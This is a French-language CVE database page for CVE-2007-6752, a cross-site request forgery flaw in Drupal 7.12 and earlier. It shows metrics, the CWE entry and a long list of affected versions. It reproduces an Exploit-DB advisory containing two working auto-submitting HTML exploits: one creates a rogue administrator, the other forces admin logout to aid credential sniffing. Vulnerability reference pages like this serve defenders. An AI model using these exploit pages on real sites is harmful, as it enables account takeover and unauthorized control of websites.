CVE-2007-6752

Catégories

Cross-Site Request Forgery - CSRF

OWSAP

A01-Broken Access Control

EPSS

0.82%V3

Vecteur

Network

Publié

2012-03-28
10h00 +00:00

Modifié

2024-09-17
00h41 +00:00

Liens officiels

CVE.org

NVD

Notifications pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.

Gestion des notifications

Liste des Notifications

Notifications pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.

Critères appliqués l'envoi de l'alerte : par rapport à la dernière alerte envoyée + différences au niveau de CISA, EPSS, CVSS, CWE, Solutions, CPE.

Paramètres

Vous pouvez spécifier un titre qui sera récupéré dans les alertes qui seront envoyées.

Spécifiez ici un CVE ID comme CVE-2025-1234

Planifications

Mois

Prochaine exécution calculée

Jour

Jour de la semaine

Heure

Minute

Date de création

Dernière exécution

Prochaine exécution

Fonctionnalité nécessitant une connexion

Cette fonctionnalité qui vous permet de recevoir des alertes, n'est active que lorsque vous êtes connecté à votre compte.

Descriptions du CVE

Cross-site request forgery (CSRF) vulnerability in Drupal 7.12 and earlier allows remote attackers to hijack the authentication of arbitrary users for requests that end a session via the user/logout URI. NOTE: the vendor disputes the significance of this issue, by considering the "security benefit against platform complexity and performance impact" and concluding that a change to the logout behavior is not planned because "for most sites it is not worth the trade-off.

Informations du CVE

Faiblesses connexes

CWE-ID	Nom de la faiblesse	Source
CWE-352	Cross-Site Request Forgery (CSRF) The web application does not, or cannot, sufficiently verify whether a request was intentionally provided by the user who sent the request, which could have originated from an unauthorized actor.

Métriques

Métriques	Score	Gravité	CVSS Vecteur	Source
V2	6.8		AV:N/AC:M/Au:N/C:P/I:P/A:P	nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 18564

Date de publication : 2012-03-01 23h00 +00:00
Auteur : Ivano Binetti
EDB Vérifié : No

+---------------------------------------------------------------------------------------------------------------------------------------------------+ # Exploit Title : Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities # Date : 02-03-2012 # Author : Ivano Binetti (http://ivanobinetti.com) # Software link : http://ftp.drupal.org/files/projects/drupal-7.12.zip # Vendor site : http://drupal.org # Version : 7.12 (and lower) # Tested on : Debian Squeeze (6.0) # Original Advisory: http://ivanobinetti.blogspot.com/2012/03/drupal-cms-712-latest-stable-release.html # EDB-ID : 18564 (http://www.exploit-db.com/exploits/18564/) # Other Advisory : http://packetstormsecurity.org/files/110404/Drupal-CMS-7.12-Cross-Site-Request-Forgery.html # Other Advisory : http://www.1337day.com/exploits/17611 +---------------------------------------------------------------------------------------------------------------------------------------------------+ +-------------------------[Multiple Vulnerabilities by Ivano Binetti]-------------------------------------------------------------------------------+ Summary 1)Introduction 2)Vulnerabilities Description 2.1 Poor Session Checking (CSRF to change any Drupal settings) 2.2 Poor Session Checking (CSRF to Force administrator logout) 2.3 Poor Session Checking (POST and GET method) 2.4 Poor Session Checking (Http Referer) 3)Exploit 3.1 Exploit (Add Administrator) 3.2 Exploit (Force logout) +---------------------------------------------------------------------------------------------------------------------------------------------------+ 1)Introduction Drupal "is an open source content management platform powering millions of websites and applications. Its built, used, and supported by an active and diverse community of people around the world". 2)Vulnerability Description Drupal 7.12 -latest stable release - suffers from multiple vulnerabilities which could allow an attacker to gain access to the management interface. 2.1 Poor Session Checking (CSRF to change any Drupal settings) Drupal, to secure changes made by administrators or users through web management interface, uses "form_token" parameter which is sent inside any http POST request. There is a security flaw inside the logic with which this parameter is generated, as is used the same parameter for for similar operations (the same "form_id") in the same session (for example for article's creation Drupal assigns the same "form_token", for admin/user creation Drupal assigns the same "form_token" and so on). Another flaw is inside "form_buid_id" parameter, which is used to fetch state from a database table during certain operations. This parameter is generated different for any operation an admin/user performs, but Drupal allows to use any other Drupal generated "form_buid_id" parameter (like this: "form-0iFqLlofT1uuJ_uwXPNdVlc_J9KL20oZE15dK9hxuQ8") to make changes to Drupal settings through web management interface. So, even if Drupal creates a different "form_buid_id" for any operation you can use another "form_buid_id"compatible with Drupal instead of that generated by Drupa for that specific operation. These flaws can be used by an attacker who knows the values of "form_buid_id" and "form_token" parameters (for example an internal attacker performing a "Man in The Middle Attack" or an external attacker that controls an internal client by an client-side exploit, an external attacker that controls directly a Drupal admin by a client-side exploit and son on. There are many possibilities) to create an "ad-hoc" crafted web page in order to makes any Drupal changes (add administrator, delete administrator, add web pages, delete web pages, ....) when a Drupal administrator or User browses that crafted web page. 2.2 Poor Session Checking (CSRF to Force administrator logout) There is another vulnerability - always related to poor session checking / improper input validation - in "<drupal_ip>/user/logout" which allows an attacker to create a crafted web page an force logout of Drupal administrator/users at web management interface. This vulnerability - forcing administrator logout - will aid an attacker to sniff authentication credentials when a "Man in The Middle Attack" is performed. 2.3 Poor Session Checking (POST and GET method) Drupal does not check "GET" or "POST" http method allowing, even though normal logout is made via http GET request, to exploit the above vulnerability using http POST method. 2.4 Poor Session Checking (Http Referer) Drupal, furthermore, does not perform "http referer" checking, allowing to exploit all above described vulnerabilities. 3)Exploit 3.1 Exploit (Add Administrator) <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit change user to admin</H2> <form method="POST" name="form0" action="http://<drupal_ip>:80/drupal/admin/people/create?render=overlay&render=overlay"> <input type="hidden" name="name" value="new_admin"/> <input type="hidden" name="mail" value="new_admin@new_admin.com"/> <input type="hidden" name="pass[pass1]" value="new_password"/> <input type="hidden" name="pass[pass2]" value="new_password"/> <input type="hidden" name="status" value="1"/> <input type="hidden" name="roles[3]" value="3"/> <input type="hidden" name="timezone" value="Europe/Prague"/> <input type="hidden" name="form_build_id" value="form-oUkbOYDjyZag-LhYFHvlPXM1rJzOHCjlHojoh_hS3pY"/> <input type="hidden" name="form_token" value="cU7nmlpWu-a4UKGFDBcVjEutgvoEidfK1Zgw0HFAtXc"/> <input type="hidden" name="form_id" value="user_register_form"/> <input type="hidden" name="op" value="Create new account"/> </form> </body> </html> 3.2 Exploit (Force logout) <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to logout Admin</H2> <form method="POST" name="form0" action="http://<drupal_ip>:80/drupal/user/logout"> </form> </body> </html> +--------------------------------------------------------------------------------------------------------------------------------------------------+

Products Mentioned

Configuraton 0

Drupal>>Drupal >> Version To (including) 7.12

Drupal>>Drupal >> Version - (Open CPE detail)
Drupal>>Drupal >> Version 4.0.0 (Open CPE detail)
Drupal>>Drupal >> Version 4.1.0 (Open CPE detail)
Drupal>>Drupal >> Version 4.2.0 (Open CPE detail)
Drupal>>Drupal >> Version 4.3.0 (Open CPE detail)
Drupal>>Drupal >> Version 4.3.1 (Open CPE detail)
Drupal>>Drupal >> Version 4.3.2 (Open CPE detail)
Drupal>>Drupal >> Version 4.4.0 (Open CPE detail)
Drupal>>Drupal >> Version 4.4.1 (Open CPE detail)
Drupal>>Drupal >> Version 4.4.2 (Open CPE detail)
Drupal>>Drupal >> Version 4.4.3 (Open CPE detail)
Drupal>>Drupal >> Version 4.5.0 (Open CPE detail)
Drupal>>Drupal >> Version 4.5.1 (Open CPE detail)
Drupal>>Drupal >> Version 4.5.2 (Open CPE detail)
Drupal>>Drupal >> Version 4.5.3 (Open CPE detail)
Drupal>>Drupal >> Version 4.5.4 (Open CPE detail)
Drupal>>Drupal >> Version 4.5.5 (Open CPE detail)
Drupal>>Drupal >> Version 4.5.6 (Open CPE detail)
Drupal>>Drupal >> Version 4.5.7 (Open CPE detail)
Drupal>>Drupal >> Version 4.5.8 (Open CPE detail)
Drupal>>Drupal >> Version 4.6.0 (Open CPE detail)
Drupal>>Drupal >> Version 4.6.1 (Open CPE detail)
Drupal>>Drupal >> Version 4.6.2 (Open CPE detail)
Drupal>>Drupal >> Version 4.6.3 (Open CPE detail)
Drupal>>Drupal >> Version 4.6.4 (Open CPE detail)
Drupal>>Drupal >> Version 4.6.5 (Open CPE detail)
Drupal>>Drupal >> Version 4.6.6 (Open CPE detail)
Drupal>>Drupal >> Version 4.6.7 (Open CPE detail)
Drupal>>Drupal >> Version 4.6.8 (Open CPE detail)
Drupal>>Drupal >> Version 4.6.9 (Open CPE detail)
Drupal>>Drupal >> Version 4.6.10 (Open CPE detail)
Drupal>>Drupal >> Version 4.6.11 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.0 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.0 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.0 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.0 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.0 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.0 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.0 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.0 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.0 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.1 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.2 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.3 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.4 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.5 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.6 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.7 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.8 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.9 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.10 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.11 (Open CPE detail)
Drupal>>Drupal >> Version 5.0 (Open CPE detail)
Drupal>>Drupal >> Version 5.0 (Open CPE detail)
Drupal>>Drupal >> Version 5.0 (Open CPE detail)
Drupal>>Drupal >> Version 5.0 (Open CPE detail)
Drupal>>Drupal >> Version 5.0 (Open CPE detail)
Drupal>>Drupal >> Version 5.0 (Open CPE detail)
Drupal>>Drupal >> Version 5.1 (Open CPE detail)
Drupal>>Drupal >> Version 5.2 (Open CPE detail)
Drupal>>Drupal >> Version 5.3 (Open CPE detail)
Drupal>>Drupal >> Version 5.4 (Open CPE detail)
Drupal>>Drupal >> Version 5.5 (Open CPE detail)
Drupal>>Drupal >> Version 5.6 (Open CPE detail)
Drupal>>Drupal >> Version 5.7 (Open CPE detail)
Drupal>>Drupal >> Version 5.8 (Open CPE detail)
Drupal>>Drupal >> Version 5.9 (Open CPE detail)
Drupal>>Drupal >> Version 5.10 (Open CPE detail)
Drupal>>Drupal >> Version 5.11 (Open CPE detail)
Drupal>>Drupal >> Version 5.12 (Open CPE detail)
Drupal>>Drupal >> Version 5.13 (Open CPE detail)
Drupal>>Drupal >> Version 5.14 (Open CPE detail)
Drupal>>Drupal >> Version 5.15 (Open CPE detail)
Drupal>>Drupal >> Version 5.16 (Open CPE detail)
Drupal>>Drupal >> Version 5.17 (Open CPE detail)
Drupal>>Drupal >> Version 5.18 (Open CPE detail)
Drupal>>Drupal >> Version 5.19 (Open CPE detail)
Drupal>>Drupal >> Version 5.20 (Open CPE detail)
Drupal>>Drupal >> Version 5.21 (Open CPE detail)
Drupal>>Drupal >> Version 5.22 (Open CPE detail)
Drupal>>Drupal >> Version 5.23 (Open CPE detail)
Drupal>>Drupal >> Version 6.0 (Open CPE detail)
Drupal>>Drupal >> Version 6.0 (Open CPE detail)
Drupal>>Drupal >> Version 6.0 (Open CPE detail)
Drupal>>Drupal >> Version 6.0 (Open CPE detail)
Drupal>>Drupal >> Version 6.0 (Open CPE detail)
Drupal>>Drupal >> Version 6.0 (Open CPE detail)
Drupal>>Drupal >> Version 6.0 (Open CPE detail)
Drupal>>Drupal >> Version 6.0 (Open CPE detail)
Drupal>>Drupal >> Version 6.0 (Open CPE detail)
Drupal>>Drupal >> Version 6.0 (Open CPE detail)
Drupal>>Drupal >> Version 6.1 (Open CPE detail)
Drupal>>Drupal >> Version 6.2 (Open CPE detail)
Drupal>>Drupal >> Version 6.3 (Open CPE detail)
Drupal>>Drupal >> Version 6.4 (Open CPE detail)
Drupal>>Drupal >> Version 6.5 (Open CPE detail)
Drupal>>Drupal >> Version 6.6 (Open CPE detail)
Drupal>>Drupal >> Version 6.7 (Open CPE detail)
Drupal>>Drupal >> Version 6.8 (Open CPE detail)
Drupal>>Drupal >> Version 6.9 (Open CPE detail)
Drupal>>Drupal >> Version 6.10 (Open CPE detail)
Drupal>>Drupal >> Version 6.11 (Open CPE detail)
Drupal>>Drupal >> Version 6.12 (Open CPE detail)
Drupal>>Drupal >> Version 6.13 (Open CPE detail)
Drupal>>Drupal >> Version 6.14 (Open CPE detail)
Drupal>>Drupal >> Version 6.15 (Open CPE detail)
Drupal>>Drupal >> Version 6.16 (Open CPE detail)
Drupal>>Drupal >> Version 6.17 (Open CPE detail)
Drupal>>Drupal >> Version 6.18 (Open CPE detail)
Drupal>>Drupal >> Version 6.19 (Open CPE detail)
Drupal>>Drupal >> Version 6.20 (Open CPE detail)
Drupal>>Drupal >> Version 6.21 (Open CPE detail)
Drupal>>Drupal >> Version 6.22 (Open CPE detail)
Drupal>>Drupal >> Version 6.23 (Open CPE detail)
Drupal>>Drupal >> Version 6.24 (Open CPE detail)
Drupal>>Drupal >> Version 6.25 (Open CPE detail)
Drupal>>Drupal >> Version 6.26 (Open CPE detail)
Drupal>>Drupal >> Version 6.27 (Open CPE detail)
Drupal>>Drupal >> Version 6.28 (Open CPE detail)
Drupal>>Drupal >> Version 6.29 (Open CPE detail)
Drupal>>Drupal >> Version 6.30 (Open CPE detail)
Drupal>>Drupal >> Version 6.31 (Open CPE detail)
Drupal>>Drupal >> Version 6.32 (Open CPE detail)
Drupal>>Drupal >> Version 6.33 (Open CPE detail)
Drupal>>Drupal >> Version 6.34 (Open CPE detail)
Drupal>>Drupal >> Version 6.35 (Open CPE detail)
Drupal>>Drupal >> Version 6.36 (Open CPE detail)
Drupal>>Drupal >> Version 6.37 (Open CPE detail)
Drupal>>Drupal >> Version 6.38 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.1 (Open CPE detail)
Drupal>>Drupal >> Version 7.2 (Open CPE detail)
Drupal>>Drupal >> Version 7.3 (Open CPE detail)
Drupal>>Drupal >> Version 7.4 (Open CPE detail)
Drupal>>Drupal >> Version 7.5 (Open CPE detail)
Drupal>>Drupal >> Version 7.6 (Open CPE detail)
Drupal>>Drupal >> Version 7.7 (Open CPE detail)
Drupal>>Drupal >> Version 7.8 (Open CPE detail)
Drupal>>Drupal >> Version 7.9 (Open CPE detail)
Drupal>>Drupal >> Version 7.10 (Open CPE detail)
Drupal>>Drupal >> Version 7.11 (Open CPE detail)
Drupal>>Drupal >> Version 7.12 (Open CPE detail)

Drupal>>Drupal >> Version 4.0

Drupal>>Drupal >> Version 4.0.0

Drupal>>Drupal >> Version 4.0.0 (Open CPE detail)

Drupal>>Drupal >> Version 4.1.0

Drupal>>Drupal >> Version 4.1.0 (Open CPE detail)

Drupal>>Drupal >> Version 4.2.0_rc

Drupal>>Drupal >> Version 4.4

Drupal>>Drupal >> Version 4.4.0

Drupal>>Drupal >> Version 4.4.0 (Open CPE detail)

Drupal>>Drupal >> Version 4.4.1

Drupal>>Drupal >> Version 4.4.1 (Open CPE detail)

Drupal>>Drupal >> Version 4.4.2

Drupal>>Drupal >> Version 4.4.2 (Open CPE detail)

Drupal>>Drupal >> Version 4.4.3

Drupal>>Drupal >> Version 4.4.3 (Open CPE detail)

Drupal>>Drupal >> Version 4.5

Drupal>>Drupal >> Version 4.5.0

Drupal>>Drupal >> Version 4.5.0 (Open CPE detail)

Drupal>>Drupal >> Version 4.5.1

Drupal>>Drupal >> Version 4.5.1 (Open CPE detail)

Drupal>>Drupal >> Version 4.5.2

Drupal>>Drupal >> Version 4.5.2 (Open CPE detail)

Drupal>>Drupal >> Version 4.5.3

Drupal>>Drupal >> Version 4.5.3 (Open CPE detail)

Drupal>>Drupal >> Version 4.5.4

Drupal>>Drupal >> Version 4.5.4 (Open CPE detail)

Drupal>>Drupal >> Version 4.5.5

Drupal>>Drupal >> Version 4.5.5 (Open CPE detail)

Drupal>>Drupal >> Version 4.5.6

Drupal>>Drupal >> Version 4.5.6 (Open CPE detail)

Drupal>>Drupal >> Version 4.5.7

Drupal>>Drupal >> Version 4.5.7 (Open CPE detail)

Drupal>>Drupal >> Version 4.5.8

Drupal>>Drupal >> Version 4.5.8 (Open CPE detail)

Drupal>>Drupal >> Version 4.6

Drupal>>Drupal >> Version 4.6.0

Drupal>>Drupal >> Version 4.6.0 (Open CPE detail)

Drupal>>Drupal >> Version 4.6.1

Drupal>>Drupal >> Version 4.6.1 (Open CPE detail)

Drupal>>Drupal >> Version 4.6.2

Drupal>>Drupal >> Version 4.6.2 (Open CPE detail)

Drupal>>Drupal >> Version 4.6.3

Drupal>>Drupal >> Version 4.6.3 (Open CPE detail)

Drupal>>Drupal >> Version 4.6.4

Drupal>>Drupal >> Version 4.6.4 (Open CPE detail)

Drupal>>Drupal >> Version 4.6.5

Drupal>>Drupal >> Version 4.6.5 (Open CPE detail)

Drupal>>Drupal >> Version 4.6.6

Drupal>>Drupal >> Version 4.6.6 (Open CPE detail)

Drupal>>Drupal >> Version 4.6.7

Drupal>>Drupal >> Version 4.6.7 (Open CPE detail)

Drupal>>Drupal >> Version 4.6.8

Drupal>>Drupal >> Version 4.6.8 (Open CPE detail)

Drupal>>Drupal >> Version 4.6.9

Drupal>>Drupal >> Version 4.6.9 (Open CPE detail)

Drupal>>Drupal >> Version 4.6.10

Drupal>>Drupal >> Version 4.6.10 (Open CPE detail)

Drupal>>Drupal >> Version 4.6.11

Drupal>>Drupal >> Version 4.6.11 (Open CPE detail)

Drupal>>Drupal >> Version 4.7

Drupal>>Drupal >> Version 4.7.0

Drupal>>Drupal >> Version 4.7.0 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.0 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.0 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.0 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.0 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.0 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.0 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.0 (Open CPE detail)
Drupal>>Drupal >> Version 4.7.0 (Open CPE detail)

Drupal>>Drupal >> Version 4.7.1

Drupal>>Drupal >> Version 4.7.1 (Open CPE detail)

Drupal>>Drupal >> Version 4.7.2

Drupal>>Drupal >> Version 4.7.2 (Open CPE detail)

Drupal>>Drupal >> Version 4.7.3

Drupal>>Drupal >> Version 4.7.3 (Open CPE detail)

Drupal>>Drupal >> Version 4.7.4

Drupal>>Drupal >> Version 4.7.4 (Open CPE detail)

Drupal>>Drupal >> Version 4.7.5

Drupal>>Drupal >> Version 4.7.5 (Open CPE detail)

Drupal>>Drupal >> Version 4.7.6

Drupal>>Drupal >> Version 4.7.6 (Open CPE detail)

Drupal>>Drupal >> Version 4.7.7

Drupal>>Drupal >> Version 4.7.7 (Open CPE detail)

Drupal>>Drupal >> Version 4.7.8

Drupal>>Drupal >> Version 4.7.8 (Open CPE detail)

Drupal>>Drupal >> Version 4.7.9

Drupal>>Drupal >> Version 4.7.9 (Open CPE detail)

Drupal>>Drupal >> Version 4.7.10

Drupal>>Drupal >> Version 4.7.10 (Open CPE detail)

Drupal>>Drupal >> Version 4.7_rev_1.2

Drupal>>Drupal >> Version 4.7_rev_1.15

Drupal>>Drupal >> Version 4.7_rev1.15

Drupal>>Drupal >> Version 4.7_revision_1.2

Drupal>>Drupal >> Version 5.0

Drupal>>Drupal >> Version 5.0 (Open CPE detail)
Drupal>>Drupal >> Version 5.0 (Open CPE detail)
Drupal>>Drupal >> Version 5.0 (Open CPE detail)
Drupal>>Drupal >> Version 5.0 (Open CPE detail)
Drupal>>Drupal >> Version 5.0 (Open CPE detail)
Drupal>>Drupal >> Version 5.0 (Open CPE detail)

Drupal>>Drupal >> Version 5.0

Drupal>>Drupal >> Version 5.0 (Open CPE detail)

Drupal>>Drupal >> Version 5.0

Drupal>>Drupal >> Version 5.0 (Open CPE detail)

Drupal>>Drupal >> Version 5.0

Drupal>>Drupal >> Version 5.0 (Open CPE detail)

Drupal>>Drupal >> Version 5.0

Drupal>>Drupal >> Version 5.0 (Open CPE detail)

Drupal>>Drupal >> Version 5.0

Drupal>>Drupal >> Version 5.0 (Open CPE detail)

Drupal>>Drupal >> Version 5.1

Drupal>>Drupal >> Version 5.1 (Open CPE detail)

Drupal>>Drupal >> Version 5.1_rev1.1

Drupal>>Drupal >> Version 5.2

Drupal>>Drupal >> Version 5.2 (Open CPE detail)

Drupal>>Drupal >> Version 5.3

Drupal>>Drupal >> Version 5.3 (Open CPE detail)

Drupal>>Drupal >> Version 5.4

Drupal>>Drupal >> Version 5.4 (Open CPE detail)

Drupal>>Drupal >> Version 5.5

Drupal>>Drupal >> Version 5.5 (Open CPE detail)

Drupal>>Drupal >> Version 5.5.

Drupal>>Drupal >> Version 5.6

Drupal>>Drupal >> Version 5.6 (Open CPE detail)

Drupal>>Drupal >> Version 5.7

Drupal>>Drupal >> Version 5.7 (Open CPE detail)

Drupal>>Drupal >> Version 5.8

Drupal>>Drupal >> Version 5.8 (Open CPE detail)

Drupal>>Drupal >> Version 5.9

Drupal>>Drupal >> Version 5.9 (Open CPE detail)

Drupal>>Drupal >> Version 5.10

Drupal>>Drupal >> Version 5.10 (Open CPE detail)

Drupal>>Drupal >> Version 5.11

Drupal>>Drupal >> Version 5.11 (Open CPE detail)

Drupal>>Drupal >> Version 5.12

Drupal>>Drupal >> Version 5.12 (Open CPE detail)

Drupal>>Drupal >> Version 5.13

Drupal>>Drupal >> Version 5.13 (Open CPE detail)

Drupal>>Drupal >> Version 5.14

Drupal>>Drupal >> Version 5.14 (Open CPE detail)

Drupal>>Drupal >> Version 5.15

Drupal>>Drupal >> Version 5.15 (Open CPE detail)

Drupal>>Drupal >> Version 5.16

Drupal>>Drupal >> Version 5.16 (Open CPE detail)

Drupal>>Drupal >> Version 5.17

Drupal>>Drupal >> Version 5.17 (Open CPE detail)

Drupal>>Drupal >> Version 5.18

Drupal>>Drupal >> Version 5.18 (Open CPE detail)

Drupal>>Drupal >> Version 5.19

Drupal>>Drupal >> Version 5.19 (Open CPE detail)

Drupal>>Drupal >> Version 5.20

Drupal>>Drupal >> Version 5.20 (Open CPE detail)

Drupal>>Drupal >> Version 5.21

Drupal>>Drupal >> Version 5.21 (Open CPE detail)

Drupal>>Drupal >> Version 5.22

Drupal>>Drupal >> Version 5.22 (Open CPE detail)

Drupal>>Drupal >> Version 5.23

Drupal>>Drupal >> Version 5.23 (Open CPE detail)

Drupal>>Drupal >> Version 5.x

Drupal>>Drupal >> Version 6.0

Drupal>>Drupal >> Version 6.0 (Open CPE detail)
Drupal>>Drupal >> Version 6.0 (Open CPE detail)
Drupal>>Drupal >> Version 6.0 (Open CPE detail)
Drupal>>Drupal >> Version 6.0 (Open CPE detail)
Drupal>>Drupal >> Version 6.0 (Open CPE detail)
Drupal>>Drupal >> Version 6.0 (Open CPE detail)
Drupal>>Drupal >> Version 6.0 (Open CPE detail)
Drupal>>Drupal >> Version 6.0 (Open CPE detail)
Drupal>>Drupal >> Version 6.0 (Open CPE detail)
Drupal>>Drupal >> Version 6.0 (Open CPE detail)

Drupal>>Drupal >> Version 6.0

Drupal>>Drupal >> Version 6.0 (Open CPE detail)

Drupal>>Drupal >> Version 6.0

Drupal>>Drupal >> Version 6.0 (Open CPE detail)

Drupal>>Drupal >> Version 6.0

Drupal>>Drupal >> Version 6.0 (Open CPE detail)

Drupal>>Drupal >> Version 6.0

Drupal>>Drupal >> Version 6.0 (Open CPE detail)

Drupal>>Drupal >> Version 6.0

Drupal>>Drupal >> Version 6.0 (Open CPE detail)

Drupal>>Drupal >> Version 6.0

Drupal>>Drupal >> Version 6.0 (Open CPE detail)

Drupal>>Drupal >> Version 6.0

Drupal>>Drupal >> Version 6.0 (Open CPE detail)

Drupal>>Drupal >> Version 6.0

Drupal>>Drupal >> Version 6.0 (Open CPE detail)

Drupal>>Drupal >> Version 6.0

Drupal>>Drupal >> Version 6.0 (Open CPE detail)

Drupal>>Drupal >> Version 6.1

Drupal>>Drupal >> Version 6.1 (Open CPE detail)

Drupal>>Drupal >> Version 6.2

Drupal>>Drupal >> Version 6.2 (Open CPE detail)

Drupal>>Drupal >> Version 6.3

Drupal>>Drupal >> Version 6.3 (Open CPE detail)

Drupal>>Drupal >> Version 6.4

Drupal>>Drupal >> Version 6.4 (Open CPE detail)

Drupal>>Drupal >> Version 6.5

Drupal>>Drupal >> Version 6.5 (Open CPE detail)

Drupal>>Drupal >> Version 6.6

Drupal>>Drupal >> Version 6.6 (Open CPE detail)

Drupal>>Drupal >> Version 6.7

Drupal>>Drupal >> Version 6.7 (Open CPE detail)

Drupal>>Drupal >> Version 6.8

Drupal>>Drupal >> Version 6.8 (Open CPE detail)

Drupal>>Drupal >> Version 6.9

Drupal>>Drupal >> Version 6.9 (Open CPE detail)

Drupal>>Drupal >> Version 6.10

Drupal>>Drupal >> Version 6.10 (Open CPE detail)

Drupal>>Drupal >> Version 6.11

Drupal>>Drupal >> Version 6.11 (Open CPE detail)

Drupal>>Drupal >> Version 6.12

Drupal>>Drupal >> Version 6.12 (Open CPE detail)

Drupal>>Drupal >> Version 6.13

Drupal>>Drupal >> Version 6.13 (Open CPE detail)

Drupal>>Drupal >> Version 6.14

Drupal>>Drupal >> Version 6.14 (Open CPE detail)

Drupal>>Drupal >> Version 6.15

Drupal>>Drupal >> Version 6.15 (Open CPE detail)

Drupal>>Drupal >> Version 6.16

Drupal>>Drupal >> Version 6.16 (Open CPE detail)

Drupal>>Drupal >> Version 6.17

Drupal>>Drupal >> Version 6.17 (Open CPE detail)

Drupal>>Drupal >> Version 6.18

Drupal>>Drupal >> Version 6.18 (Open CPE detail)

Drupal>>Drupal >> Version 6.19

Drupal>>Drupal >> Version 6.19 (Open CPE detail)

Drupal>>Drupal >> Version 6.20

Drupal>>Drupal >> Version 6.20 (Open CPE detail)

Drupal>>Drupal >> Version 6.21

Drupal>>Drupal >> Version 6.21 (Open CPE detail)

Drupal>>Drupal >> Version 6.22

Drupal>>Drupal >> Version 6.22 (Open CPE detail)

Drupal>>Drupal >> Version 6.23

Drupal>>Drupal >> Version 6.23 (Open CPE detail)

Drupal>>Drupal >> Version 6.24

Drupal>>Drupal >> Version 6.24 (Open CPE detail)

Drupal>>Drupal >> Version 6.x-dev

Drupal>>Drupal >> Version 7.0

Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)
Drupal>>Drupal >> Version 7.0 (Open CPE detail)

Drupal>>Drupal >> Version 7.0

Drupal>>Drupal >> Version 7.0 (Open CPE detail)

Drupal>>Drupal >> Version 7.0

Drupal>>Drupal >> Version 7.0 (Open CPE detail)

Drupal>>Drupal >> Version 7.0

Drupal>>Drupal >> Version 7.0 (Open CPE detail)

Drupal>>Drupal >> Version 7.0

Drupal>>Drupal >> Version 7.0 (Open CPE detail)

Drupal>>Drupal >> Version 7.0

Drupal>>Drupal >> Version 7.0 (Open CPE detail)

Drupal>>Drupal >> Version 7.0

Drupal>>Drupal >> Version 7.0 (Open CPE detail)

Drupal>>Drupal >> Version 7.0

Drupal>>Drupal >> Version 7.0 (Open CPE detail)

Drupal>>Drupal >> Version 7.0

Drupal>>Drupal >> Version 7.0 (Open CPE detail)

Drupal>>Drupal >> Version 7.0

Drupal>>Drupal >> Version 7.0 (Open CPE detail)

Drupal>>Drupal >> Version 7.0

Drupal>>Drupal >> Version 7.0 (Open CPE detail)

